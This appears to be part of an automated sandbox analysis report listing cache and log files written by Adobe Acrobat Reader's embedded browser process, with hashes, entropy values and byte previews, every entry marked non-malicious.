                                                                                                                                                                                                                            SHA-256:5A37F69D6E0E997A3233736081C5ED4A25FBA3A34044FD0E98868F807EAAA9EA
                                                                                                                                                                                                                            SHA-512:9CA12F6B7463B482AF926CE895EBABEF6C500EC15A83C59F02B0017F92FB3E7684D8AFA70A85C296E300779172250FF6FE92ADD04CAD2DC88CCB2400C143742B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......P....r......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/selector.js .F%;.=/....."#.D$."x..A.A..Eo......<..=........Z.Z}Q..4.o....0+..[|..n:*..U.W.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):188
                                                                                                                                                                                                                            Entropy (8bit):5.606320392905867
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+l8UElLA8RzYOCGLvHkWBGKuKPK7CvvVN5tlYv69k/MktRntEBiaQ562HvpMm1:mAElVYOFLvEW1Kc5tlYRtxDx56uvp1
                                                                                                                                                                                                                            MD5:D06907BB9EFBFBF8AC8D5C16BB84AFAA
                                                                                                                                                                                                                            SHA1:F4AE4AF2190B79C7651E7B2C50CD768A11A53132
                                                                                                                                                                                                                            SHA-256:CEA9FBE2C0EB021CD1019FDE435AF5E9AE10E2A57C6839D5251F08647F5B1B4E
                                                                                                                                                                                                                            SHA-512:7BF8EFC3D67BE8096137A990805D46F992E7E3B72F273E81E6BBE0BD88F674EC0A3674EB54D63D92CE0D3E42543590EFBC0021021E364F23205A637690AE0752
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......<...)6......_keyhttps://rna-resource.acrobat.com/static/js/rna-main.js ...0.=/....."#.D.v.w..A.A..Eo......l..b........z?...SwC...^..y.....V..7R-O.....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                                                            Entropy (8bit):5.66310782117574
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mWYOFLvEWdBJvvuyl/lpt9DdUDLYtmOZn1:xRBJPl/lprSDcFZ
                                                                                                                                                                                                                            MD5:F34162A8C080B61DA7766A295F06D24A
                                                                                                                                                                                                                            SHA1:0A0E5D6ECF54668B1E3D96287D56D934D5E15B83
                                                                                                                                                                                                                            SHA-256:CA77D7A924C0152B797CFE3F70B3C4C8E3EDD4C91E0744D03B1EF13CF9989A9D
                                                                                                                                                                                                                            SHA-512:ED8E9EC8FA772219A35661E89D303D1F6688E6CF290570D79F9910D0910A3DFEFCAA16D37FB51E706EB569D0CEF125C3ABEB3992B4A4F6D49751221DC948BECA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......V.....h....._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/selector.js ..DB.=/....."#.D<.Kx..A.A..Eo......=...............t.q..W.EZ....1...[.zC.7mD..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                                            Entropy (8bit):5.5871781549679564
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lxCq//6v8RzYOCGLvHkWBGKuKCH6U4LJzWHK7WFv6jYKXlkbMktWAHXpSKGoS6:msRPYOFLvEWIa7zp7FYKXlkptd8VPu1
                                                                                                                                                                                                                            MD5:F56D4624AF079E851043A1E7D66D79F4
                                                                                                                                                                                                                            SHA1:BC6D68363ABEED8AE6A1A29B64D12597F6A95707
                                                                                                                                                                                                                            SHA-256:24460BBD8ADC6045D86087C41B4B21086523089F32DD4EFD42A92DAEC72514F1
                                                                                                                                                                                                                            SHA-512:BA83412E0D5187AE309595DF2BC924EF62D51FFF862B43022F0AA55BBC4EDBFAF11672AF2970AF1998C297AFDC839AF748EE05470415EFC07AB6E71AEAB11DCE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......S...{.j....._keyhttps://rna-resource.acrobat.com/static/js/libs/require/2.1.15/require.min.js ...-.=/....."#.D...w..A.A..Eo......k.]............L...Im.@.........E.nW...IP..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                            Entropy (8bit):5.596436272538276
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mKPYOFLvEWdENU9QxKqlaqtUy6wiM3Y1:bJRT9ChlaqHr
                                                                                                                                                                                                                            MD5:C1D2D40C94E2F7897DB051D8205A2097
                                                                                                                                                                                                                            SHA1:5FA148FDFE4F62F83D014677A6EC78E330B663D9
                                                                                                                                                                                                                            SHA-256:8D4A6D3CA637E27AAADA51500723A2351F391AA7407124F954BB6113E56AA33F
                                                                                                                                                                                                                            SHA-512:8F874AB29785BFE217CA0FCFF318767F8CE3CADB2A519B5D832910C08EDC946F4E7159B2E523AE7956B2DB13F27E6EBE96A4902492F36142F45F1A0AFE641D45
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......P...Yft....._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/plugin.js ...>.=/....."#.D..2x..A.A..Eo.........+...........M....m+lS..e.....<7.U.P8*.0K.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                            Entropy (8bit):5.6197764310588205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mQt6EYOFLvEWdccAHQpzlPt1OjBRCh/41:XRc9OzlPHODi/
                                                                                                                                                                                                                            MD5:2A3D95466B41A5E51A9A0DDC89A4EE18
                                                                                                                                                                                                                            SHA1:CC4A9B62FEA7EA34F31F5AA3304FC393D4810293
                                                                                                                                                                                                                            SHA-256:8635E0F310702B1C5FF5EE782CD72EE1E779839268674C2B3D1C73D08CE61B43
                                                                                                                                                                                                                            SHA-512:ABCE905C1320CBF8CF0AF202110463858E499ADA0FCFA83721B263BFE0DD7C2F1EDE63DA02969E66B49F955E6E83FFBFDF0B13199F56C768A3B8CF37E8BDD382
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......P...W3......_keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/plugin.js .<hC.=/....."#.D..Yx..A.A..Eo......7...........PJm...0x.x..RD...BB!@5..<..]....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):231
                                                                                                                                                                                                                            Entropy (8bit):5.562755480732927
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mqs6XYOFLvEWdFCi5mhu0/llDJjtpkULlF4r1:bs6xRki+/llDJj/7LlF4
                                                                                                                                                                                                                            MD5:8BA14C9CF30ACD1E51144D795633E294
                                                                                                                                                                                                                            SHA1:30596FABA52F1ED3ECE84E035A1536C23F11EEFF
                                                                                                                                                                                                                            SHA-256:70827FC1982BD48DA00D0EE25D117228E4E9F12064DB2FC0A57CDA8D287D7D18
                                                                                                                                                                                                                            SHA-512:F0AB0F827BF05ABE61AEFA8224A4C2DA1339BBEDD46E5CB7693716B9DB9684A58A66003F04F5D5C2DB2857F4CF759E79E93F05EE70D84577D6BDF7484603C083
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......g...~.I?...._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-selector.js .....=/....."#.D.j.w..A.A..Eo...................P...#4..l....5...5..).w.. .h.~..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):215
                                                                                                                                                                                                                            Entropy (8bit):5.497259516783185
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mhYOFLvEWd/aFupsHnll/lBJWk9tEnEN941:WRel/lvj9EEN9
                                                                                                                                                                                                                            MD5:339008EB72DD0944403CDCF24E25F8F1
                                                                                                                                                                                                                            SHA1:76997ECF51923DB302034FFAA56375D41EE7FC6D
                                                                                                                                                                                                                            SHA-256:C8BE24DE00AB4F984E64B3845A076AAF397DB615B28E19EBEFF096BE9405E9AA
                                                                                                                                                                                                                            SHA-512:761937DAD686869A768EA7A1C36D21C5E1ECE32E9244110ACBF6FC5FF30BD725442AC89BAC88A9304C21AD2526BE7BCFE4B6C082EC5E3E903FE08BF42751D610
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......W....w.m...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-recent-files/js/selector.js ...D.=/....."#.D..Mx..A.A..Eo.........p...........a.f.m.i.o.p..3U5.....^...I.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                            Entropy (8bit):5.526917886013215
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mR9YOFLvEWd7VIGXOdQR+l/leStn1DBMqVd3G4K41:2DRuRWa/leSjDB9Vd2
                                                                                                                                                                                                                            MD5:9819C9C7667B5F565FBDA0C9319B81C6
                                                                                                                                                                                                                            SHA1:1A16A05FA0C1257CD59148DB7CB71915A37F210B
                                                                                                                                                                                                                            SHA-256:96E51FA1B1578C083865B1E6A00C50A8AA7B6A428F8ADCAD60B37BD2F801B9E3
                                                                                                                                                                                                                            SHA-512:5F8382178A822F776A765CD159965BF74E1198D02C25E79E4BD8CAC286A4BD0B4FA9E95B687BEE985BE30B450ABFBB578E7328F8BB2442A5DEEDBF7041EC559C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......P...y.p....._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/plugin.js ..bD.=/....."#.D'.Lx..A.A..Eo.......A............y.$..$.v5j...T...z.]..._S....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                            Entropy (8bit):5.583067430946323
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mkqYOFLvEWd8CAd9QNHYK//lS7bStS9TuA424r1:+RQ+4a/lS7bSgir
                                                                                                                                                                                                                            MD5:3044AE81AC6E8826CBEBED2A3D8AA490
                                                                                                                                                                                                                            SHA1:8B6509131A81A039AFBB565942C8A2E8B32416ED
                                                                                                                                                                                                                            SHA-256:C81EAD603EEAE5A1691A6D99CB01FD38C926080E72DC6986ECFCF4BFD2E7D371
                                                                                                                                                                                                                            SHA-512:1A0288F28866DCA688E039188F115CF379BC3BAF3CAF13742F6CC0FC248A0A04A844F0ABE95FE783631B62CA8CDDC0C9D91745A6CF53E746AEA6276C8C1D2414
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......P...gT....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/plugin.js ...D.=/....."#.D.Yx..A.A..Eo.......P`.........#..@..k(v.8g..5.~_....]Pj.*..6.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):210
                                                                                                                                                                                                                            Entropy (8bit):5.564881115492691
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:moXXYOFLvEWdENUAuOva/l0I7tG+yC8n1:xhRTMqlho+7
                                                                                                                                                                                                                            MD5:13FD1FE91B21895209671E43E33869DE
                                                                                                                                                                                                                            SHA1:6A8A54F6B0DF28F6723B8FBD6E2A1545A9AD3CF3
                                                                                                                                                                                                                            SHA-256:6C42DB519AB2F06AC251017F4D76609F7E00861DECC304617494A7B8D5A854F9
                                                                                                                                                                                                                            SHA-512:45D0C42A7C84BBDF29277239C319BE43A885AD966CFACBDE731E6E3852F54097285581D41CF69BBFA08A88127EAFFF3BFEB4C1CD018964E025299A464F3B45DB
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......R..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/uss-search/js/selector.js ..|=.=/....."#.D.--x..A.A..Eo..................8.../...;.\\o....1..........+..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):221
                                                                                                                                                                                                                            Entropy (8bit):5.620087110693568
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mQZYOFLvEWdrROk/VQW/lKXuWQtN/tsLmB41:nRrROk/VvlKHQJN
                                                                                                                                                                                                                            MD5:61314CDBCEDA238EF06FF50CFA2E1D92
                                                                                                                                                                                                                            SHA1:E8CF5637894F25BE55274554D2014519574A9427
                                                                                                                                                                                                                            SHA-256:2C107F57450C5D218F395EB53E2B4C17D9208C410474E70E9D92090053D6B2CD
                                                                                                                                                                                                                            SHA-512:634C10F69A0F81E6F1EDD060AF6CBCAD37762634199D1624C9628628977363A108E2DBCCD265F5DF14C5ECA5C4F2C5D84632CB76F55CC1F7DA1AEBD45ECE3961
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......]......,...._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/plugin.js ...;.=/....."#.D..$x..A.A..Eo......0........... ./.ev......N~..6.b.....$.j;:C...A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):210
                                                                                                                                                                                                                            Entropy (8bit):5.570969290155554
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mZ/lXYOFLvEWdccAWuOd/lIiSbStvdm9741:qxRck/lfSbSldu7
                                                                                                                                                                                                                            MD5:DB8F92C887479C11A33AB1EAE5ACBB20
                                                                                                                                                                                                                            SHA1:DC8B1B0EB128F0A3AD1E52E30AB8D294F1B86060
                                                                                                                                                                                                                            SHA-256:0E24749C119827070CF52315F5629E62553A07E5BF3091DAF64FEAECA6C1FEF9
                                                                                                                                                                                                                            SHA-512:181EC834DF3B046C61F9F7657E122F4BC609328ACE65BF74FCEEA518D798B5FFD80801D261DC206C78C918CD2554F15B2BEEF952893A0CA878ED7560B91BD265
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......R...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/scan-files/js/selector.js ...B.=/....."#.D..Kx..A.A..Eo........1............U...I.>P...X...x..0U.~;m.x.k.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                            Entropy (8bit):5.564626879864795
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mMOYOFLvEWdwAPVu4xYK//lM9t4tEB6Jn1:2R11lloyX
                                                                                                                                                                                                                            MD5:51E888B768504D58B035CF1C2C1F5CC2
                                                                                                                                                                                                                            SHA1:3210CE8F0CDCABAAE3ACAA9D141A7FC0FE774A2F
                                                                                                                                                                                                                            SHA-256:D392D71EF687A40246930C003237FE2D915E7B0E572845D4C50B2352F4AC0C01
                                                                                                                                                                                                                            SHA-512:B776DEA48E50E092EF0E7A0A8D24EEFE98E1C2B586A15F5077FD584FA2BAF6259248FCCD281AE7C3CE70833934FFA9B49EF438F3A858CD4EEA87FEAEC80E7EEF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......L....Ey....._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/selector.js ..{=.=/....."#.D..-x..A.A..Eo.......................k....F..D..O.n;[.1m.....=..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):212
                                                                                                                                                                                                                            Entropy (8bit):5.654608307885305
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:m3PXYOFLvEWdBJvYQ1Pl/l5mttqhcsBXIh1:mxRBJQQd/lELaB
                                                                                                                                                                                                                            MD5:54E136BE3AFF47560230BAFF3B303539
                                                                                                                                                                                                                            SHA1:87076108A1D15C25BD1DF60320DE16D56408A288
                                                                                                                                                                                                                            SHA-256:B93D9805D95B3CCC008EA5E9D3CF7E2E99B0633324B5D21E94C73CD6AD89C363
                                                                                                                                                                                                                            SHA-512:D7AD28D46265D878E93853B2C5C6FF0B5C4CDCBF08203AA5FE25C5C1444FC4D60D3C1740685ED7E42FE240F9719E918ABD25C30DE9C494867CD732995B78712F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......T......z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/activity-badge/js/plugin.js ...D.=/....."#.D#.Lx..A.A..Eo.....................k..`..N3.... ..d..$[.....{.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):228
                                                                                                                                                                                                                            Entropy (8bit):5.570259149961253
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:msPYOFLvEWdrROk/RJUQwNj//l8xgtxLc3Me/1:3RrROk/sDXl2gXL
                                                                                                                                                                                                                            MD5:6C680A7AE3B7D7FAF2005D2A5D7EB34E
                                                                                                                                                                                                                            SHA1:6B74AAAF529E6F8C617ADDD2C8EE82E6C42F10E7
                                                                                                                                                                                                                            SHA-256:7E5CA5A1178E6E4545D48AD893FB2B57E60C34877074D54F3B2CC7D92867A45B
                                                                                                                                                                                                                            SHA-512:4DB525D1C387287327685CAA257BB68EFEF6D68FE01FA484B0001DD4EF538E4CDCC0D3A1A32F6BED754550FB5C5164BC6024F268F472CA1F3D8276DF091AFCE4
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......d...<.s....._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/plugin.js ...;.=/....."#.D..$x..A.A..Eo......zk-L.............9Q].8O.z....=..:.N.{....N{.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:Maple help database
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1032
                                                                                                                                                                                                                            Entropy (8bit):5.096915160498379
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:n+HrlyG+lQJvMf2+lnJoeqn9lflElQlwlnla+lrlwhl9XlSlOPlj8+lKlS:n8rlyG+l442+lJXy9lflElQlwlnla+lO
                                                                                                                                                                                                                            MD5:F5DB33E198739B1DD6B17279415DB184
                                                                                                                                                                                                                            SHA1:BBD5620CA41CC014360A5024F2015B0A3EA6CAD5
                                                                                                                                                                                                                            SHA-256:56775AE3182FB04D836DAF73A3FD426A1711BFE585F2D843F624D0B877E827CC
                                                                                                                                                                                                                            SHA-512:A9EACDA214F8A981E1BCB84917333FF7E5970C1D7FA8181DBC45886215CA70778B15B905F70672DB9769616A0722D920D0F03D03AB11A2DD8834CE875898202B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.....).oy retne....)........R............*...x3.=/...........;.y~A..x3.=/..............oB*.5$.=/............#...(@...................D.4.@.B.=/..........[.i..%.@.B.=/.............k7A..x3.=/..........]...I..o..=/.........,+..._.#.x3.=/.........<...W..J.5$.=/..........J..j....x3.=/...........6<|....5$.=/...........2q.....x3.=/...........P....V.x3.=/.........!...0.o@.B.=/............P[. q.x3.=/...........3....x3.=/..........v...q...5$.=/...........a.....5$.=/..........C..M..@.......................o..=/.........F..=z;..x3.=/.............o..x3.=/.........Gy.'.h..x3.=/.........:..N.A...x3.=/..........;/....x3.=/.................x3.=/.........A?.2:..@.B.=/..............q.@.B.=/..........u\]..q@.B.=/..........o..k..@.B.=/...........*....@.B.=/.........^.~..z.@.B.=/..........+.{..'@.B.=/..........@..x.@.B.=/.........*)....J:@.B.=/............MV3..@.B.=/..........&.S....@.B.=/.........+.U.!..V@.B.=/..........~.,.4>.@.B.=/.........
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:Maple help database
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1032
                                                                                                                                                                                                                            Entropy (8bit):5.096915160498379
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:n+HrlyG+lQJvMf2+lnJoeqn9lflElQlwlnla+lrlwhl9XlSlOPlj8+lKlS:n8rlyG+l442+lJXy9lflElQlwlnla+lO
                                                                                                                                                                                                                            MD5:F5DB33E198739B1DD6B17279415DB184
                                                                                                                                                                                                                            SHA1:BBD5620CA41CC014360A5024F2015B0A3EA6CAD5
                                                                                                                                                                                                                            SHA-256:56775AE3182FB04D836DAF73A3FD426A1711BFE585F2D843F624D0B877E827CC
                                                                                                                                                                                                                            SHA-512:A9EACDA214F8A981E1BCB84917333FF7E5970C1D7FA8181DBC45886215CA70778B15B905F70672DB9769616A0722D920D0F03D03AB11A2DD8834CE875898202B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:.....).oy retne....)........R............*...x3.=/...........;.y~A..x3.=/..............oB*.5$.=/............#...(@...................D.4.@.B.=/..........[.i..%.@.B.=/.............k7A..x3.=/..........]...I..o..=/.........,+..._.#.x3.=/.........<...W..J.5$.=/..........J..j....x3.=/...........6<|....5$.=/...........2q.....x3.=/...........P....V.x3.=/.........!...0.o@.B.=/............P[. q.x3.=/...........3....x3.=/..........v...q...5$.=/...........a.....5$.=/..........C..M..@.......................o..=/.........F..=z;..x3.=/.............o..x3.=/.........Gy.'.h..x3.=/.........:..N.A...x3.=/..........;/....x3.=/.................x3.=/.........A?.2:..@.B.=/..............q.@.B.=/..........u\]..q@.B.=/..........o..k..@.B.=/...........*....@.B.=/.........^.~..z.@.B.=/..........+.{..'@.B.=/..........@..x.@.B.=/.........*)....J:@.B.=/............MV3..@.B.=/..........&.S....@.B.=/.........+.U.!..V@.B.=/..........~.,.4>.@.B.=/.........
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):298
                                                                                                                                                                                                                            Entropy (8bit):5.174715286966042
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:AioL+q2PN72nKuAl9OmbnIFUtqVfiKBKWZmwYVfiKkLVkwON72nKuAl9OmbjLJ:AioL+vVaHAahFUtiiK8W/IiKkLV5OaHi
                                                                                                                                                                                                                            MD5:0FFC5A236FE966AF2A9E7A73E4D7F4A0
                                                                                                                                                                                                                            SHA1:D1CFFBD63C0DA7BD8EAF51359A181DF167E9C957
                                                                                                                                                                                                                            SHA-256:B67D80BC76A9BD3B0FA5117AD66D880EA7F7FB79921212BFCA96C99B57586D79
                                                                                                                                                                                                                            SHA-512:5042C33D4760395F37F39C614606DC423139A8560F96BB5A9B2D2DEA8BFD867E1D0E4272FE67145B7C339897611ACA68F7FC23F8430544FA572E912FF2B3DE71
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:2022/05/13-20:45:12.407 173c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2022/05/13-20:45:12.416 173c Recovering log #3.2022/05/13-20:45:12.417 173c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):298
                                                                                                                                                                                                                            Entropy (8bit):5.174715286966042
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:AioL+q2PN72nKuAl9OmbnIFUtqVfiKBKWZmwYVfiKkLVkwON72nKuAl9OmbjLJ:AioL+vVaHAahFUtiiK8W/IiKkLV5OaHi
                                                                                                                                                                                                                            MD5:0FFC5A236FE966AF2A9E7A73E4D7F4A0
                                                                                                                                                                                                                            SHA1:D1CFFBD63C0DA7BD8EAF51359A181DF167E9C957
                                                                                                                                                                                                                            SHA-256:B67D80BC76A9BD3B0FA5117AD66D880EA7F7FB79921212BFCA96C99B57586D79
                                                                                                                                                                                                                            SHA-512:5042C33D4760395F37F39C614606DC423139A8560F96BB5A9B2D2DEA8BFD867E1D0E4272FE67145B7C339897611ACA68F7FC23F8430544FA572E912FF2B3DE71
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:2022/05/13-20:45:12.407 173c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2022/05/13-20:45:12.416 173c Recovering log #3.2022/05/13-20:45:12.417 173c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):131072
                                                                                                                                                                                                                            Entropy (8bit):0.008751778056341745
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:ImtV6FSn/eElwllx3nOtWGY4/l/0yaQgpn:IiV6EnWMwlr1AtMyaQSn
                                                                                                                                                                                                                            MD5:3CDF4DD67B462B6603FAE426952965A5
                                                                                                                                                                                                                            SHA1:172F1BCAA40DF4ACB182DB1DB5B72D15C5AB677E
                                                                                                                                                                                                                            SHA-256:B317BB26B68B5695447E8131700CC2D2A5389DB38FF3FFBD50BA10475965527B
                                                                                                                                                                                                                            SHA-512:9EFBDE44641F1C71724A72E42B8343076DAEBCFDE1204F1EB2F4FF8FA7931DB340686B527367EE114C99E07D0D3D3FCC7FBFFD2E8E60DE40EE816A05B8C005C3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:VLnk.....?........`.N.7................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):71190
                                                                                                                                                                                                                            Entropy (8bit):1.406467270520687
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:V8gVh7J67QSES5ZAB9M57rTH6rTTTqT+6:OgVh7J67QSES5ZAB9M57riXWa6
